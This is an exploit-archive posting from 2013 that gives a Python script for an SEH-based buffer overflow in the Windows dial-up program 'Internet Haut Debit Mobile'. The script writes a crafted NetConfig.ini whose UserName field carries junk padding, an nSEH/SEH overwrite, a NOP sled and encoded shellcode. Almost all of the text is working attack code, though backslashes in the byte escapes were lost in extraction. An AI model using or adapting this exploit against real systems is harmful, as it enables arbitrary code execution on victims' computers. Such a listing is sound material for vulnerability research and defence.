Home / exploits Internet Haut Debit Mobile Buffer Overflow
Posted on 11 October 2013
#!/usr/bin/python #Exploit Title:Internet Haut Debit Mobile Buffer Overflow SEH #Software Link:https://app.box.com/s/4h9cm20hp5iiask8rwrm #Poc video demo :http://www.youtube.com/watch?v=sAHfjmNHiow&feature=youtu.be #Version:PCW_MATMARV1.0.0B03 #Date found: 10.10.2013 #Date published:10.10.2013 #Exploit Author: metacom #RST #Tested on: Windows XP sp3 En from struct import pack file="NetConfig.ini" print "[*]Copy NetConfig.ini to C:Program FilesInternet Haut Debit Mobile " print "[*]Open Program Go to (parameter->options) " print "[*]Click Buffer Overflow SEH and press (Vue -> View) " junk="x41" * 461 nseh="xebx42x90x90" seh=pack('<I',0x0F9A196A) nops="x90" * 80 ##x00x0ax0d shellcode=("xbax50x3exf5xa5xdaxd7xd9x74x24xf4x5bx31xc9xb1" "x33x83xc3x04x31x53x0ex03x03x30x17x50x5fxa4x5e" "x9bx9fx35x01x15x7ax04x13x41x0fx35xa3x01x5dxb6" "x48x47x75x4dx3cx40x7axe6x8bxb6xb5xf7x3dx77x19" "x3bx5fx0bx63x68xbfx32xacx7dxbex73xd0x8ex92x2c" "x9fx3dx03x58xddxfdx22x8ex6axbdx5cxabxacx4axd7" "xb2xfcxe3x6cxfcxe4x88x2bxddx15x5cx28x21x5cxe9" "x9bxd1x5fx3bxd2x1ax6ex03xb9x24x5fx8exc3x61x67" "x71xb6x99x94x0cxc1x59xe7xcax44x7cx4fx98xffxa4" "x6ex4dx99x2fx7cx3axedx68x60xbdx22x03x9cx36xc5" "xc4x15x0cxe2xc0x7exd6x8bx51xdaxb9xb4x82x82x66" "x11xc8x20x72x23x93x2ex85xa1xa9x17x85xb9xb1x37" "xeex88x3axd8x69x15xe9x9dx86x5fxb0xb7x0ex06x20" "x8ax52xb9x9exc8x6ax3ax2bxb0x88x22x5exb5xd5xe4" "xb2xc7x46x81xb4x74x66x80xd6x1bxf4x48x37xbex7c" "xeax47") header ="x68x74x74x70x3ax2fx2f" exploit=header + junk + nseh + seh + nops + shellcode poc="x5bx42x75x66x66x65x72x20x4fx76x65x72x66x6cx6fx77x20x53x45x48x5d " poc+="x4ex61x6dx65x3d" + " " poc+="x55x73x65x72x4ex61x6dx65x3d" + exploit + " " poc+="x55x73x65x72x50x61x73x73x3d" +" " poc+="x44x69x61x6cx4ex75x6dx3dx2ax39x39x23" + " " poc+="x49x73x41x75x74x6fx47x65x74x41x50x4ex3dx30" + " " poc+="x41x50x4ex3dx77x77x77x2ex69x61x6dx67x70x72x73x32x2ex6dx61" + " " poc+="x49x73x41x75x74x6fx47x65x74x44x4ex53x3dx31" + " " poc+="x4dx61x69x6ex44x4ex53x61x64x64x72x3d" + " " poc+="x41x6cx74x44x4ex53x41x64x64x72x3d" + " " poc+="x49x73x41x75x74x6fx47x65x74x50x44x50x3dx31 " + " " poc+="x70x64x70x41x64x64x72x3d" + " " poc+="x70x64x70x54x79x70x65x3dx49x50" + " " poc+="x41x75x74x68x54x79x70x65x3dx50x41x50" + " " poc+="x61x73x6bx55x73x65x72x41x6ex64x50x61x73x73x3dx30" + " " poc+="x53x61x76x65x75x73x65x72x41x6ex64x50x61x73x73x3dx30" + " " poc+="x49x73x46x61x63x74x6fx72x79x44x65x66x61x75x6cx74x3dx31" + " " poc+="x44x65x6ex69x45x64x69x74x44x65x6cx65x74x65x3dx31" + " " poc+="x49x73x44x66x61x75x6cx74x3dx31" + " " try: print "[*]Creating exploit file... " writeFile = open (file, "w") writeFile.write( poc ) writeFile.close() raw_input("[*]File successfully created! Press Enter") except: print "[!] Error while creating file!"
